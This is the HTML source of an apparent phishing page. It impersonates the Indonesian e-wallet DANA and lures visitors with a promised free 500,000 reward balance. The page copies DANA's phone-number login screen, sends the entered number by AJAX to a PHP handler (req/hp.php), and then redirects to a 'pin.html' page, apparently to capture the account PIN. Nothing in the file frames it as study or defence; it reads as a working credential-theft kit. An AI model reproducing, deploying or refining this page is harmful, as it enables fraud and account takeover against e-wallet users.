<!DOCTYPE html>
<html>
    <head>
        <title>Claim Reward Saldo DANA Gratis 500.000 Langsung Cair</title>
        <meta charset="UTF-8">
        <meta name="description" content="Reward Saldo Dana Gartis Mulai Hari, Claim sekarang dan cairkan sekarang reward saldo danq gratis">
        <meta name="keywords" content="Saldo dana gratis, Reward Saldo Dana">
        <meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <link rel="icon" type="image/x-icon" href="./assets/img/favicon/favicon.ico">
        <link rel="apple-touch-icon" sizes="180x180" href="./assets/img/favicon/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="./assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="./assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="./assets/img/favicon/site.webmanifest">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous"> 
        <link rel="stylesheet" href="css/loading.css" type="text/css" media="all" />
        <link rel="stylesheet" href="css/main.css" type="text/css" media="all" />
    </head>
    <body>
        <!-- ketika halaman di klik munculkan loading -->
        <div id="process" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="img/load_bg.png">
                <img class="spinner" src="img/load_spin.png">
            </div>
        </div>
        
        <div class="main-body">
            <div class="nav-dana">
                <img src="img/dnl.png" alt="" />
                </div> 
        
        
            <form onsubmit="sendNohplog(event);" method="POST" class="container p-4" id="formNohplog">
            <div class="form-nohp">
                <div class="text-masuk">
                    Masukkan nomor HP kamu untuk lanjut
                </div>
                <div class="inp-no mt-4">
                    <div class="flx-id-no">
                        <span>Negara</span>
                        <span>Nomor</span>
                    </div>
                    <div class="flx-inp mt-2">
                         <div class="box-codeTel">
                        <img src="img/indo.png" alt="" />
                        <span>+62</span>
                    </div>
                    <input type="tel" name="nohp" 
                    id="nope" placeholder="811-2345-6789" class="inphp"
                    autocomplete="off" autofocus/>
                    </div>
                    <input type="hidden" name="nope" id="nope" value="" />
                </div>
                <div class="desc-text text-center mt-4">
                    Kami akan menggunakan nomor HP ini sebagai ID kamu dan untuk mengamankan akun kamu. Dengan melanjutkan, kamu juga setuju dengan <strong>S&K</strong> serta <strong>Kebijakan Privasi</strong> kami.
                </div>
            </div>
            <div class="btn-laniut">
                <button type="submit" id="btn-send" disabled>Lanjutkan</button>
            </div>
            </form>
        </div>
    </body>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="js/jquery.min.js"></script>
    <script src="js/jquery.mask.min.js"></script>

    <script>
    let inp = document.getElementById("nope");
    let btn = document.getElementById("btn-send");
    inp.addEventListener("input", val);

    function val() {
        if (inp.value.length > 10) {
            btn.disabled = false;
        } else {
            btn.disabled = true;
        }
    };
    </script>
    
    <script>
    
    $(document).ready(function(){
        $(document).submit(function(e) {
            event.preventDefault();
            document.getElementById('btn-send').innerHTML = "Memproses....";
        });
        return false;
    });
    
    
    function sendNohplog(event) {
        $("#process").show();
        event.preventDefault();
        $("#nope").blur();
        $.ajax({
            type: 'POST',
            url: 'req/hp.php',
            data: $('#formNohplog').serialize(),
            dataType: 'text',
            success: function() {
                setTimeout(function() {
                window.location.href = "pin.html";
                }, 1000);
            }
        });
    };
    </script>
    
    <script>
    $(document).ready(function() {
        $('#nope').on('input', function() {
            if ($(this).val() == '0' || $(this).val() == '62') {
                $(this).val('');
            }
        });
    });
    </script>
    <script>
    $(document).ready(function() {
        $('#nope').mask('000-0000-000000');
    });
    </script>
    
    
</html>
